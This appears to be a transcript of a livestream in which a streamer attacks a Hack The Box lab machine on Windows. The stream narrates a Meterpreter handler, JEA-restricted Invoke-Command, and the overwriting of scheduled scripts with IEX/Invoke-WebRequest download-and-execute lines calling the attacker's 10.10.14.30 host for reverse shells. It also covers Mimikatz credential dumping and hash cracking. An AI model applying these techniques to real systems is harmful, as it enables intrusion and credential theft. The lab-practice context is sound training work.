What do you mean what it... My friend, 0 Delta. 06 Delta. Exactly what? I am loving on my cat. The real star of the stream. Let's do stream raiders really quickly. Well, we'll get the interpreter shell first. Use exploit multi-handler. Set payload. Oh, it's I can't remember. Set L host. How can I not remember my interpreter syntax? There. Okay, we will run. Alrighty. And my friend, we have that most wonderful of phrases. Interpreter session 1 opened. Second only to new beacon check-in from computer name. Let's do stream raiders really quick. Alrighty. I've been grinding so many Windows machines the last 6 weeks that I went through 2 Linux machines in practice and like, wait, how do? That's good. Well, it's not good to be rusty on Linux. You don't want to be rusty on Linux, but definitely committing yourself to doing more Windows machines is also a good thing. It is definitely a good thing. All right, friends, bring them. Let's just beat the devil out of these guys, okay? Beat the devil out of this. You can do anything you want. This is your world. What can be painted can be punished, chat. What is that Interpreter Session 1 GIF from? What Interpreter Session 1 GIF? Anthony J.A. with the 100 Teagle biddies. Thank you so much, my friend. Thank you so much. Okay, we are running in Interpreter. Help. There is an option for screenshots. Screenshot. Screenshot. Now, that may not have worked. Which process? What is it? Is it get PID? Yeah. We're in process ID 96. Which process are we in? That may not have worked. Yes. I would imagine that probably did not work. We're going to need to migrate into one of these other processes. We are going to have to migrate into one of... We'll see what we got from that. But I doubt that screenshot actually worked. We need to be in... we need to be out of session 0. But let's have a look-see anyways. Oh, it did work. No migration necessary. I thought we would have to be in session 1 for that. We would have to be in a user logon session, I would have thought, but we have something here. What have we here, my friends? My goodness, are those fine additions? Is this guy? Is this guy just sitting in remote desktop looking at looking at his credentials just on this. This guy's just sitting in remote desktop. I'm just imagining him sitting with in the remote desktop with his credentials just sitting on the screen. Well, we have his credentials. Well, this is someone else's username, I would imagine. Acute. Hi, monks. Excellent. What a cute little gimmick on this box, chat. You don't usually see that. You do see it in real life, obviously. But you don't usually see that in... in CTFs. How cute. I like it already. We are the Force. Yeah, I've definitely never done that on Hack the Box. How unusual. Not that I am complaining. So let's go back to our reverse shell. And let's do... Now, I do not think that enter PS session is going to work for us. He's doing enter PS session here. Yeah. He's doing enter PS session here. I don't think that's going to work in the reverse shell, so we're going to have to use invoke command. Like that. But first we have to make a credential object. PowerShell hates you passing your credentials at the command line, so it's put as many obstacles in your way to make that as a pain in the ass, as much of a pain in the ass as it can possibly be. So let me pull up... Here we go. Right here. We'll just go down the...
I'm one with the Force is with me.
I am one with the Force is with me. The only good Disney Star Wars movie, and I do mean just good, it's not great. In fact, I can't believe they're doing a Cassian Andor miniseries. At this point, like, who was like, you know who I really want to hear more about in the Star Wars universe? Cassian Andor. Who said that, chat? Was that you, Etsy Sec? Was that you? Are you the one who forced us to have Cassian Andor as a miniseries? Okay. I think it was you, Etsy Sec. I think it was you. You got guilt written all over you. Okay, let's just go down the list here. So you have to create a new secure string, as in it's a string that's been encrypted by the data protection API. And then you have to feed that. So this is acute / imonks. Acute / imonks. Okay. Okay, that's the cred. That's the cred. Let's do invoke command. Computer. What was the name of this computer again? Actually, what computer is he entering? ATS server, the domain controller, right? ATS server. Script block. And then it wants braces for some fucking for some hecking reason. And we can try host name. And I think it actually wants spaces here. PowerShell is so horrendously particular about this. Credential. Is it credential? Dollar cred? God, I hate this so much. Why? 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 Username or password is incorrect. Did I do it correctly? PowerShell is so horrendously idiosyncratic about this particular thing I'm trying to do here. Is it computer name? My notes say it might be computer name. PowerShell is so good. What did I type wrong? Did I typo something? Check the password again. Did I type the password incorrectly? That is entirely possible. We are the Force. R is capitalized. You are right. Good one. I think I copied it from my notes. Let me get it correct in my notes. That'll, you are the Force. Yep, that would do it. Thank you. At least we identified what the issue was. Again, PowerShell is tremendously idiosyncratic about this particular activity that we're doing here. It is incredibly picky. We still don't get it. W3 underscore 4 capital R3 underscore TH3 underscore F0RCE period. Change W to W. This is clearly a lowercase. Okay, now I'm not as sure. Okay, let's zoom in. Let's zoom in and let's argue. Okay? Lowercase or uppercase? God, Al. Why do you hate PowerShell so much? Listen, Al, what's wrong with... Legitimately, what's wrong with PowerShell? Other than the fact that they use this tremendously god-awful font. Disastrously god-awful font. It is upper. Everyone's saying it's upper, so we'll give it a shot as upper. Definitely want to... I know if I'm choosing a font for my programming language, I know that I would make it difficult to tell between a lowercase and an uppercase letter. Absolute fuck's sake. This is why I change my font in my own PowerShell prompt. We still don't get it. We are the Force. Any other things that are actually uppercase but look lowercase? Maybe the 0. I think that's a 0. Does that not look like a 0? There is a period. Yeah, I know. There's a period. I put the period at the end. Is that a 0? No, I think it's a 0. It's got to be a 0. It's shaped like a 0. I put the period at the end. There's a period at the end right there. Right there. My God. Well, let's look at dollar error. Maybe we're getting a different error for some reason. RPC server is unavailable. Isn't there a space after period? I don't think so. I don't think so. Does that look like a space? I'm honestly not sure. I'm honestly not sure if that's a space or not. DC man. Oh, right. They did say something about DC manage, didn't they? What did they say about that? Run sessions named DC manage. Is he using DC manage in this? It does not say. DC manage. Let's try and Google that. Was it? It was. Hang on. DC underscore manage. Let's find out what that is. Just enough administration for domain controllers. So it's some way of restricting people's activities on domain controllers? Convert to secure string. Yeah, that's what I did. Let's go. I did that. I'm trying to figure out what to do with this DC manage thing, if anything. Thank you for reminding me of that. I'd completely forgotten about it. DC manage. Is it going to tell us how to do PowerShell with it? Configuration file? Register PS session configuration. Is it going to give me an example of name test help desk? Here we go. Computer name, configuration name. Let's try that. I don't think that's a space after. I'm not going with the space. I do not think that's a space. Configuration name DC underscore manage. Holy shit, it's a miracle. Whoever reminded me of DC manage is a saint. Who reminded me of DC manage? Big brain. Big wrinkly brain. Nice. We probably want to move the script block to the end. So all of that was just the joy of PowerShell. Don't you love PowerShell, chat? Does that have to be spaces? Yeah, no, there does not. So this is, we're executing commands on the domain controller, I would assume. Oh, but interesting, that did not work. So, what commands can we execute? Maybe we can just do get commandlet. Oh, there's a get command commandlet. Let's try get command. Okay, perfect. Excellent. Commandlet. So, can't do a whole lot. Get alias. Get child item. Let's run get alias as well. So, it looks like we're in sort of a constrained language mode, it appears, where you can only execute these commandlets. Get command, get content, which lets us read files, get location. I guess that's like present working directory, yeah? Okay, so we're in iMonk's documents folder. Perfect. Set content. Get help set content. What does that do? Set content. And it doesn't only has the partial help. Let's find out what set content does. Set content, string processing that writes new content or replaces existing content. Oh, so it lets us write to files. Okay, cool. So we can read to files with get content. We can change directories. We can write to files. Or we can, this is echo. We can use echo. We can list the contents of directories. We can get our current working directory. We can write to files, and we can print, and we can also print files with that. Okay, that's what we can do. So, C users, iMonk's desktop. Let's see if we can get child item of what's on his desktop. Nothing. Maybe that's the incorrect path. We're in the documents folder, so let's just go back, go into the desktop like that. Nothing. CD desktop GCI tech hidden. Maybe there's hidden files. Nope. Can you just use ls? Yeah, you can. It's only an alias though, it doesn't matter. What the hell? Wasn't get child item allowed? Yeah. Why does ls work? ls is just an alias. It's just an I don't know why. So we do have user.text here. We finally do have user.text. So let's type user.text. And we get the user.text. Excellent. Excellent chat. Happy user.text chat. Do you have to type out the full name? No, I typed out GCI. That's the accepted shorthand. User.txt has password for other users. I just did. No, it has that, but there's this wm.ps1. Let's see what that's going on there. Ah.
A fine addition to my collection.
Well, this would seem like a very strong password to you, but this is one of those secure strings, it looks like. This... Convert to secure string. This looks like it's been encrypted by the data protection API. So this is not a legitimate password. This looks like it has been encrypted by the data protection API, so it's not really going to be useful to us. It's just an encrypted blob. We have Acute J Morgan. Invoke command. So it's executing a command on Acute PC01. Credential $creds. Have you tried admin? What do you mean, have I tried admin? What the hell does that even mean? What? Have I tried admin? What the fuck does that mean? I've been completely derailed. What was I going to do? Oh, right. Let me copy this into my notes. And then we'll figure out what we're going to do with this. So this string is, again, is probably not a password. It's probably an encrypted password. Nothing. No hidden stuff then. Unless there's a desktop.ini. No desktop.ini. So I'm wondering if this is running maybe as a scheduled task, because we can write to files. I can't get ACL on this, but we can see if we can write to the file. How does set content work? Writes new content or replaces existing content. Set content. Replace text in a file. So we can replace this text here with some arbitrary code, I wonder, and see if it'll execute on our behalf. Filter. I hate Microsoft's help. This is fucking worthless. Jesus Christ. Get content, tack replace. The quick white fox. So replace brown with white. Can't you just execute? Sure. But all it's going to do is get volume. We don't care about that. I wanted to give me a reverse shell. So get content. C users iMonk's desktop. God, I'm fucking tired. I did not sleep well last night. I am so... Alhaz Ross is so tired today, chat. Probably take a nap after this. And then go right back to work. Desktop. Was it wm.ps1? Yes. wm.ps1. Raw. Replace get volume. Get tac volume. And will my reverse shell fit in there? Probably not. Let's probably not do that. Let's do IEX IWR for invoke web request http://10101430 Cthulhu.ps1 use basic parsing. I think. So we're going to get content. And then we're going to set the content to that. That seems reasonable. Path C users amongst KTAC raw replace get volume with IEX invoke expression, invoke web request 10101430. Yeah, we just need a Cthulhu.ps1. Okay. Ten 1430. We'll make it 8444 this time. And there we go. Split this in half. RL wrap. Listening on 8444. Okay. So if this works, it should replace the contents of that file. Okay, let's see if we can... Splendid! Look! Frickin' easy, bro! Look at that! It's beautiful. It's beautiful, chat. Let's see if it comes in. It may or may not be a scheduled task, but I don't think there's a way to decrypt that without access to the user's master key in the data protection API. Let's do Stream Raiders real quick. But did Alhaz Ross run Netstat? He did not. He's doing some happy painting, some happy molding. Well, hopefully we didn't make any birds. You ever make mistakes in life, chat? They're birds. Let's make them birds. They're birds now. The mistakes are birds. Nice hair, bro. Thank you, Fizeth. So nice of you. I worked on it for many a time. Did not again. You are kidding me. Guess what happened, chat? Guess what happened? We're taking deep breaths, chat. But yes, those who are guessing that the VPN died on me are absolutely correct. The VPN did die on me, chat. It's okay. We're going to take deep breaths. We're going to take deep breaths. Okay? We're not upset. We're not upset, chat. Everything's okay. Deep breaths. Deep breaths. This is acceptable for a platform of HacktheBox's caliber. This is completely acceptable. Absolutely acceptable. This is absolutely 100% acceptable for a platform of HacktheBox's challenge caliber, chat.
Please! God damn it! I hate this hacker crap. Calling that.
I'm not upset. Deep breaths. Deep breaths, chat. It's okay. Deep breaths. Happy little VPN. Exactly. Exactly. HacktheBox just made all their mistakes into birds.
Happy little VPN.
We're just going to make
resets.
every time the VPN takes a shit on us into birds. They're birds now, chat. Okay? Everyone, let's take a big Alhaz Ross deep breath. We only need to wait like 7 to 8 minutes for the box to reboot. It's okay. This is acceptable. It is acceptable that now every single stream that I do of a HacktheBox machine, that the VPN does die on me. Okay? It is completely acceptable that every single stream we now have the VPN die on us. Need to get VIP plus? Dude, I'm in the freaking mod server. You guys can't even access these virtual machines. These virtual machines are in the moderator lab. And the moderator lab is shitting the bed. I'm sorry. Pooping the bed. This is completely acceptable for a platform of HacktheBox's caliber. It's a good thing. It's a really good thing, chat, that HacktheBox has no notable competitors in the industry that are beating them at their own game right now. It's really good that they can't even get their VPN to work. That's pretty good. That's fine. Anthony J.A. with the 100 Tiggle Bitties. Ghosts are spooky. Indeed. Happy little VPN resets. Jifram with 1 Tiggle Bitty. Wololo, Yusuf, and Asmirno. Thank you for the follows. Try Hack Me also has this. I don't have, like, it's now every single stream with HacktheBox that this happens. Every single stream. This is the 3rd stream in a row that the VPN has died on us. This is not acceptable anymore. This is no longer acceptable. Every so often, the VPN dying, it's to the point where if a command ever hangs for me, I immediately assume the VPN is dead. And it's always on the boxes for which it's maximally irritating to get our place back. I don't think it should take as long as that Kubernetes box did. Do you happen to check out Taggart's stream last night? No, I was working all last night on the on this CTF I'm supposed to be bringing you guys. It's a lot of work to make something like this happen. It's a lot of work to do it right. So I was working on that all last night. I did not catch Taggart's stream. The computer name. What's the damn computer name again? Acute PC01. I believe Acute PC01 is the container.
For doing it right.
Password was password1 exclamation point, and the username was E Davies. Oh God. I'm not upset, chat. You're upset. I'm not upset, chat. Why would I be upset? Why? Why ever would I be upset, chat? I'm doing just fine. I am doing perfectly okay. No problems whatsoever. That's good. It can't connect to the computer. That's excellent. I would really love to wait longer for this box to spin up after the VPN died. That would be good. It was Acute PC01, was it not? Yes, it was. We still on Stream Raiders? We are on Stream Raiders right now. The next battle is ready in 23 minutes, my friends. This is completely acceptable. I really enjoy this. It was E. Davies, wasn't it? It wasn't a different one? E. Davies. I don't think it should be case sensitive. Let's make sure I'm getting the password correct. I do absolutely... Oh yeah, you're still looking at the... You're still on Stream Raiders, yes. My mistake. There's nothing to see anyway. There we go. We are back. We are back. Completely acceptable for this to happen every single stream. This is completely acceptable. This is completely and totally acceptable. No issues whatsoever. Definitely not going to have words with Emma or HacktheBox Ryan after this. Definitely not going to have words. I'm feeling very good about their platform right now. Very, very good about their platform. I forgot to change the IP address, so we are waiting for this to time out. Oh my God, please cancel. Boy, this is a great, absolutely a fantastic console. Holy cow. Love this console. I can't even hit home to go to the beginning of the command. Like with every other terminal out there. We get to experience the joy of PowerShell yet again, chat. Dude, really? Oh, we got a connection. Okay. What the frick did we do? Oh, right. Let's, we got a interpreter shell. We looked at the... We don't need the interpreter shell again, do we? I don't think we do. So let's just do my favorite thing, which is the incredibly convoluted PowerShell run as. Let's do this again. With this password, with the capital W and the capital R. Okay. Splendid. Let's see. We are not upset, chat. We are not upset. We are totally on the level. Where is the run as? There. $cred. Acute imonks. And then $password. Okay, splendid. So now we can do the invoke command. Computer name. AS server or ATS server. Configuration name, was it? Manage. Credential. $cred. Script block. Host name. There we go. Okay, now we're thankfully back to where we were pretty much. And thankfully I wrote down the command that we just wrote to replace the content of the file. So we can just slap this back in here. Okay. IEX, IWR, 10.10.14.30. Cthulhu.ps1. Use basic parsing. Okay. Let us see if we get a callback from that. Why invoke command instead of new PS session? I'm not writing this command. But in this particular case, new PS session doesn't work with reverse shells very well. This particular reverse shell, I believe I've tried in new PS session before and it doesn't work very well. So it's a bit cumbersome doing invoke command every time, but it does work. Now let's see if this does work. You ever watch Dave's Garage? I've never seen Dave's Garage, no. I hate web access PowerShell. Yeah, it's quite dumb. Are we going to get a callback? Now, we don't actually know if this is a scheduled task or not. I suspect that it is. We're just giving it a second to see if it runs. Did you update the new IP address? All the IP addresses are the same. 10.10.14.30 is still my IP address. All the IP addresses are still the same. Dude, what? No, it's still... Oh no, it's just very slow. But yeah, our command is still in there. I thought for a second the VPN had died again. Invoke web request 10.10.14.30 Cthulhu.ps1. Yeah, I think that should be correct. But we don't get a callback. So it could be we are supposed to decrypt this, but I'm pretty sure, again, this is protected by the data protection API. I'm pretty sure this has been encrypted. This looks like encrypted blob by the data protection API. And you cannot decrypt that without the user's master key. And we are not even running as the user J Morgan, I don't think. We're running as imonks. We're not J Morgan, so we are not likely to have access to his stuff. God damn it. I thought that would work. It's okay. This is a happy place, chat. This is a happy place. We are happy. We are at peace. We are at peace with the world, chat.
What are you doing, step bro? What are you doing, step bro? What are you doing, step bro?
I hate myself, chat. Why do I do this? It still didn't work. Like, obviously I can just execute it. I don't know why I'm sitting here waiting to see if it's a scheduled task. The password is right here. I can just execute it. But it is not pulling down my script. There is a safe word. No, I don't need a walkthrough. This hasn't been so hard yet. It's just frustrating. Why isn't that working? Does it not understand IEX, IWR? It's possible it doesn't understand IWR. Yeah, it does. We did it. No, we did it with wget before. Wget is an alias of it. It's on this box that we're executing it. We can try it here. See, that did work. See? So why is it not working over here? You might have to set the execution policy to bypass. I can't execute that commandlet. Recall we're running in kind of a limited shell here. Like, am I executing this correctly? Okay. So we're on the desktop now. Jifferam, thank you so much. You're so kind. All those fine birds that you've sent us. Those fine birds. Not mistakes. They're birds. Okay? You're not mistakes. Analog Android, Random Wiseman, Weiss, WS Scorpio, and Wookiee Phoenix. Wookeen Phoenix. You are not a mistake. Okay? What the fuck? Why? I'm afraid. Is it going to get changed back at some point? Usually these Hack the Box machines have scripts that change them back. I don't feel like I should need to use Netcat. I don't know why it's not working. Let's try it this way. Hint, you need Netcat? I don't think I do. Why would I need Netcat? Why in the world would I need Netcat, chat? Put a space. It's 2 parentheses? No, it's not. This is kind of an older one that I don't use as often anymore. Download string 10.10.14.30. We can try that. I don't know why that string would work and my previous string wouldn't. But I don't know why our string is failing. Unusual. Okay. I don't know why that's not executing, chat. Have a good day, Mr. Crumbs. Thanks for being here. Hate Handles, thank you so much for the raid. Sly Override, Earn Dog, thank you for 69 Tingle Bitties. You remember when this didn't take 3.5 years, chat? Neither do I. Sweet Jesus, this takes forever. Every command takes like 10 to 15 seconds to execute. It's painful. It didn't even work. Well, we did get a call back there, but it didn't execute. Oh, yeah, it did. It just took a long time. So this is not... This is just E. Davies again. Yeah. But that proves that our command works. It executes. I don't know why it's not executing in the PowerShell script. I don't know what's going on, chat. I just know it's PowerShell business. Did I lose my shell? I lost my shell. Could it be related to the restricted? I don't think so. I don't think so. Of course it doesn't remember my command history. Why would it? Okay. Just like the 4 millionth time. Okay. Great. Let's go stop. I don't know what you're talking about. I'm assuming you're giving spoilers for the box, but so please stop. We're gonna get there. Stop. Where I promise you we're gonna get there. I don't know why this is not executing. It doesn't seem to even be reaching out to us. Come on. This is fucking painful. Oh, finally. We got there. Okay, we are now Jay Morgan. Congratulations, chat. We did it. So this must be a domain account. We cannot interact. For some reason, this machine cannot interact with the domain controller. Okay, we're Jay Morgan. Acute PC01. Oh, we're just an administrator. Sweet. Okay, that makes me feel a lot better. The birds are with us, chat. I do hidden every time now. Okay, so we are an admin now. So probably just Mimikatz, right? Let's just run Mimikatz. keep in mind, we're not admin on the actual host. We are admin in the we are only admin in the we're only admin in the Acute PC01. We want to be domain admin. We want to move to the domain controller. Is this often this frustrating mold-inducing in the real world thing? I don't usually have to operate purely in PowerShell. Most of the frustration in this is coming from operating purely in PowerShell, which Alhaz Ross does not particularly care for. It's okay. It's all right. It's all right. We're having happy little molds, happy thoughts. Windows Defender is running, but we have an exclusion folder. I just don't think we're going to be able to get it to run. It's probably easiest if we just do it in Kiwi. So let's do Kiwi instead. Is this bot just pasting random commands into chat? No. I don't know what he's doing. He's telling me that's the command for how to get the SAM file from the registry. Yeah, I can definitely do that as an admin. But I think it's easier to just run Mimikatz. We're going to run Mimikatz. Yeah, Let's Go is definitely very good at the box. Definitely very, very good. Okay. Okay, we got interpreter running. Cthulhu.exe. Okay. There's a number of ways you can do this. The way that our friend Let's Go is doing it is totally reasonable, but it'll only get you the SAM file. Load Kiwi. I want to run Mimikatz. Which is usually what I do when I get admin in a domain environment. I run Mimikatz. Help. Creds all. Not running a system. Get system? Usually doesn't work these days. Token impersonation isn't what it used to be. Okay. Get UID. We're system. Hooray. Creds all. Let's get all them creds. And there's all the creds. Okay, what do we have? We have E. Davies. We have the user account. Just E. Davies? Really? Well, damn. I thought there'd be more in there. I guess just E. Davies. Can it pull the SAM file? LSA dump SAM. You can also do hash dump. There we go. We have Kiwi loaded, so why? We have Natasha's hash here. Okay. We have Natasha's hash. HacktheBox Natasha. We do have Kerberos keys in memory, so at one time this machine was domain joined. Well, it's domain joined now, it just can't contact the domain controller. And we have an administrator hash right here. Okay, those are NTLM hashes. We could use Mimikatz to pass the hash on those. I'm not sure what good that does us, though. We want to get to the domain controller. Let's try and crack these, or at least start trying to crack them. NTLM hashes crack very quickly, so it is likely, if they're supposed to crack, they will crack. We have to specify exactly which type it is. Is it TAC format equals NTLM? God damn it. Why does it name its fucking hash types so fucking weirdly? I mean, I'm not mad. I'm not mad. I am Alhaz Ross today. Alhaz Ross is not mad. Format equals NT. Perfect. Christ. There we go. Password 123. A very strong password. So we do have administrator's password here. Splendid. I'm not sure what that gets us because we all are already administrator. But just for kicks and giggles, we do have administrator password there. Splendid. Okay. Someone said something about program files, I think. I don't see anything here. I don't see anything in program files. Let's do Stream Raiders really quick. An error occurred. Okay, I guess we're not doing Stream Raiders at the moment. Let me try to reload it. 1 second. It's possible it's updating. For these hashes, I like CrackStation. You could have used CrackStation for sure, yeah. It looks like it is updating. So why would this crack then? Maybe for one of these other users? Password reuse, perhaps? Maybe we can finally get to L. Hopkins. Remember, Lois Hopkins is the one that has the personnel, the authorization to change group membership. Let's try that. Let's try $cred. Let me go back. I'll just copy and paste it from the... I this. I hate this. I hate it. I hate it. I hate it so much. There will never come a time in my life when I don't fucking hate the way PowerShell makes you do run as. This is so asinine. It's so annoying. I mean, I'm fine, chat. I'm fine. I'm fine. Where's the run as? Okay, I'm sorry. I gotta take the wig off. It's like, it's killing my head. All House Ross is done for today. Sorry, everyone. Sorry, everyone. All House Ross is done for today. We got a good 3 hours out of it. My head can't take it anymore. It literally, like, constricts my head. Oh, why did I do that? No. We want the password. God, I hate PowerShell so fucking much. I hate it. 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 This box has forced me to be in PowerShell this whole time. I am not a happy camper. Okay, Acute, and it was L. Hopkins. Okay, invoke, command. Computer name, ATS server, configuration name, DC manage, credential, script block. All right, let's see. We're just trying to see, why would they give us this password if it wouldn't work somewhere? $error. Username or password is incorrect. So let's go back up. Let's do same password, but let's do a different person. So we can't do L. Hopkins, we're assuming. Unless I did that wrong, which is entirely possible because it's so picky. Let's try C. Hall. Okay. That did nothing. Username or password is incorrect. So that didn't work either. And E. Davies, we already tried. iMonks, we already tried. J. Morgan, we already tried. That's everyone, right? We didn't try F. Castle. Okay, let's go. I'm going to time you out. Stop trying to tell me the box. I don't even know what you're talking about. I'm just going to time you out for a few minutes, okay? Just stop. Come on. Just stop. I don't even know what you're talking about. I don't even know what you're talking about, my dude. I'm assuming you're giving spoilers for the box because you've been doing it this whole time. Just stop. Man, I gotta try HacktheBox. This one is I just hate PowerShell. I can't stand it. Were there any of these we didn't try? We tried L. Hopkins, J. Morgan, I. Monks, E. Davies, C. Hall. Did we do A. Wallace?
A hunter must hunt.
I don't remember if we did A. Wallace. I feel like I just need to try all of these in case of password reuse. I don't know why they'd give us a password in this case for administrator when we already had administrator. Unless... No, we didn't try Wallace. So let's try Wallace real quick. And if that doesn't work, I guess we're back to the drawing board. I don't know why they'd give us a password except if that password works for a domain account. Of course it'd be the last one I'd try, chat. Of course it'd be the last one I'd try. Alright, so we are A. Wallace. Get command. And we just have the same fucking shit. Okay. Splendid. Kraz Bozonks, thank you so much for the 9 months. Jiffaram bringing us Random Wiseman and Analog Android. Welcome back to the All Has Red team. Sly Override, thanks for the follow. Earn Dog, thanks for the 69 Tiggle biddies. Cheers for doing it right. What are you talking? I'm not sure what you were talking about, but I'm trying to do it right. I am trying to do it correctly. So we literally just have the same fucking permissions as before. God, I'm so fucking tired of PowerShell. Like tonight, I want to code in a good language. Okay, well, there's the Hyper-V that we were talking about. So that explains how there are two machines. One of them is running as a virtual machine. You're never gonna get it if you don't yell at us. Like I'm keeping it easy, okay? I love when I ran Mimikatz on a box when my wife was sitting next to me and she immediately was like, "Yep, that's an ASCII vag." Yep. That is. I mean, the Kiwi thing does look like an ASCII vag. You're not wrong. You're absolutely not wrong. What the fuck is this? Okay, that is something. I assumed I was going to look at the virtualization technology, but what the fuck is keep me on? Keep me on.bat? Is this just going to be another fucking file to modify? Okay, this box started out super interestingly. Like, it started out super interestingly with that screenshot thing and the remote desktop. That was really cool. And now, like, the whole rest of it has been doing PowerShell invoke command nonstop, waiting 10 seconds between every command. And just basically modifying files on disk that conveniently run. It started out real strong, but Clam security! I've been at this for 3 hours now! I'm tired of PowerShell! PowerShell can suck my taint! For Lois's use only. This is run every 5 minutes. How convenient. How convenient. So what is this? What the fuck? What are these Eldritch runes? Does anybody know what this fucking does? For /r in star.bat do, if not $ equals call. Is it just running every batch script in here? Is it just running? Like, is this all the box creator had? The box creator had one idea. Like, literally one idea. And the idea was, hey, what if you could do a screenshot? What if you could do like a screenshot of the box? Yeah, I assume that it's skipping keepmeon.bat so it doesn't just run recursively the whole time. But like the box creator had one idea and the rest of it was just, hey, you're going to be in PowerShell the whole fucking time. And you're going to hate your life. You're literally going to hate your life. So I can just write a batch script here, right? So set content. So can we do like echo PowerShell -C IEX IWR We could do something like that, I think. Just do like PowerShell -C. Will that work? Will this work for a batch script, guys? All right. And we can just pipe that into set content. Thusly. I'm so fucking bored with PowerShell, dude. Oh my god. Like right at the beginning when the 740i said, I hope you like PowerShell, I was like,
No, God! No, God, please, no! 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 No!
Cthulhu at bat. Okay. Excuse me. Okay, let's do this fucking again. Like it's the same thing. Like it's just the same thing as it was before. It's literally just the same fucking shit again. Just modify this file. Like I'm over it at this point. I'm just over it. It's the same shit over and over again. Is there going to be something else after this? Are we ever going to get to domain stuff? What I want to know is, are we ever going to get to do, like, Bloodhound or anything? Because I'm kind of losing hope for that. This whole thing has just been painful PowerShell shit. Fromaster, do you want to get up here and wrangle with PowerShell? Stick your dick in this console? Invoke command? Listen, size does matter. This is too fucking big. This is too big. There is such a thing as too big. Look at this fucking garbage. It's stretching my terminal. All right. Let's see if Cthulhu got wrote. It did not, so that did not work. Great. Set content. If I just want to write to a file. Oh my God, please. Please. Kill me. Set content, tag path, and tag value. Okay. Maybe it didn't like. I had to put maybe I had to put the path here in quotes. Because Windows, in its fucking genius, puts spaces in default paths. This has been going on since documents and settings. You remember documents and settings? You guys remember that fucking garbage? Windows is still doing that. We can't just take the fucking, like, there's literally an entire privesc vector on Windows that revolves purely around the fact that there are spaces in default file paths. Like, there's an entire privesc vector. An entire privesc vector in Windows revolves around the fact that folders have spaces in them all the time. And Windows still leaves spaces in here. It's so fucking stupid. Yeah, unquoted service paths. It's so fucking stupid. All right, let's try that. I sure love PowerShell. Yes, I do. I love PowerShell. Yes, I do. Let's do more PowerShell today. PowerShell is a totally fine programming language. Totally fine. No issues. Okay, at least it wrote this time. All right, now we get to wait for 5 fucking minutes. Your voice is 100% Mr. Beast? I don't know. I've only seen a couple of Mr. Beast's videos. Obviously, I'm aware of him. He's like the biggest YouTuber on the platform, other than maybe PewDiePie. I guess. Like, obviously, I'm aware of him, but I don't know how he sounds. Let's try Stream Raiders again. I guess Stream Raiders seems like it was down or up or updating. I love PowerShell. Yes, I do. PowerShell is a perfectly fine programming language. Yes, it is. Definitely no problems with PowerShell. PS is secure because most attackers lose their minds before getting anywhere useful. But most attackers these days don't use PowerShell. OA Labs Live with the raid. Welcome, my friends. Welcome. We're doing some PowerShell and enjoying it the whole time. We are only enjoying it and never not enjoying it. Welcome, my raiders. Welcome, welcome, welcome. It looks like Stream Raiders is still down. We are waiting to see if our exploit is going to work here. We have written a batch script which should get executed, I think. This works for a batch file, doesn't it, chat? This should get executed at some point. Okay, it did work. All right, so I guess we have to wait. It says it runs every 5 minutes. Runs every 5 minutes. Let's get a marble run to relax. Sure, let's do marbles. Let's do marbles, okay? Let's do marbles. Hang on. Let me load up Steam. We will do marbles. PowerShell is a perfectly fine programming language, okay? Perfectly fine. Okay, PowerShell's is doing okay. And that's the best you can ask for it, is to do okay. Am I really not signed into my password manager anywhere? God damn it. We're gonna do a marbles. Hang on a second. Because Stream Raiders is down or something. We're waiting to see if this is gonna run. I don't know if it's gonna run or not. The fucking VPN will probably go down again. Isn't it pretty essential to know PowerShell? Yeah, you have to know it to some degree. Doesn't mean I have to like it. I know PowerShell to some degree. That doesn't mean I have to like it. I assure you, I don't have to like it. Of course it has to update. Well, Marbles has to update. That's good. I know it just enough to hate it? Oh, I believe... But I know it. You're never going to stop hating it if you're anything like me. Some people love it. Some psychopaths actually love PowerShell. I hear they're actually using that as a gauge of actual sociopathy. Like, if you go to a psychologist and they ask you, so how do you feel about Windows PowerShell? And you say, oh, it's okay. They immediately, they don't just check the box that says sociopath. They fucking, grind it in there. Like, super hard. Like, it's in a big check mark. All right. Let's do, how do I do this again? Race? Race. Okay, race. And we'll hit random. Pixels Death Alley. Perfect. Race. Okay. Exclamation point play in chat. Exclamation point play in chat. Okay, remind me how I interact with this. What do I do? Okay, WASD. Exclamation point play in chat. It doesn't cost anything. Doesn't cost anything. We're just doing this to pass the time while we wait to see if our payload runs. Which it still has not. Which makes me feel real good about my life. Okay, we'll give it another 30 seconds or so. Exclamation point play if you want to win. If you want to play marbles. All right, let's do it. Race starts in 10, 9. How can I not? I can't move. Oh, there I can. All right, they're off. How do I get names? Remind me how I get names. How do I turn the names on? Tiberius, help me. How do I turn names on? I don't know who's winning. FDSSec apparently is winning. No, I know my cam is covering the names on the... But there's a way you can turn on name labels for every ball. Butt stab. Butt stab. Oh, just gave Frostmelka a good butt stab. His signature move. His signature move. Is he going to give him the butt stab again? No. No, he opts out. He opts away. One time is all Frostmelka gets. Graphics now out in front. Man, he is hitting those boosts. Holy shit. I can't even keep up. I can't even move fast enough. But he's stuck now. Oh, he's going to hit the boost again. Oh, there he goes. God, he's going so fast. Gotta go fast. I've always said that about graphics. He's gotta go fast. Get in there, graphics. You got this. He's dodging these expertly. Absolutely expertly dodges the pillars. Oh, and he hit... No! Graphics! He's completely at a standstill. Butt stab comes up for the win. Butt stab out of nowhere. Coming from behind, as is tradition. As is tradition, butt stab. Coming from behind. Butt stab, graphics, loving Scotty, Maticus Maximus with the our top winners. Oh my god, what? Streamlabs is lagging. That's good. There we go. All right. Butt Stab, Graphics, Loving Scotty, Maticus Maximus, Anthony J.A., Sarovi, Ototus, Fromaster, Ascertainment, and Yomi. Well done. Well done, my friends. Let's see if we got our callback. If we did not, we're going to have to try it again. We did not get it. Fucking Christ. Example batch script. There's probably some stupid batch script syntax that was not good enough for fucking batch. I fucking hate this. This sucks so much ass. Look at this. Like, what? Okay. All right. Yeah, no one writes batch scripts anymore. I don't know why it's not executing. Run a PowerShell script from a batch file. Maybe we have to do execution policy bypass, I guess? Do we have to do echo off? I don't think we have to do echo off. I'm so fucking tired of operating in PowerShell. This is so fucking stupid. Just don't echo out. Yeah, it shouldn't matter. I don't know why this is not executing, chat. It's probably some stupid fucking nuance about bash scripts. Or batch scripts, excuse me. I sure do love PowerShell. It's so good. It's so good, chat. Maybe full path? It shouldn't need the full path. Are you really trying to tell me it can't find PowerShell.exe? I don't know what it wants, dude. But we did not get a call back. I want to be done with this box so fucking bad. I am so bored. I am so fucking bored with this box. It's every box, every single part of this box has been, hey, just there, you can write to this file that gets executed. Let's go. I'm just gonna no. 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 I don't even know if I should continue. I don't even know if this is worth it. Like, I'm so bored with this. Like, I'm so fucking bored with executing PowerShell to modify files and just having them run. Is there something about 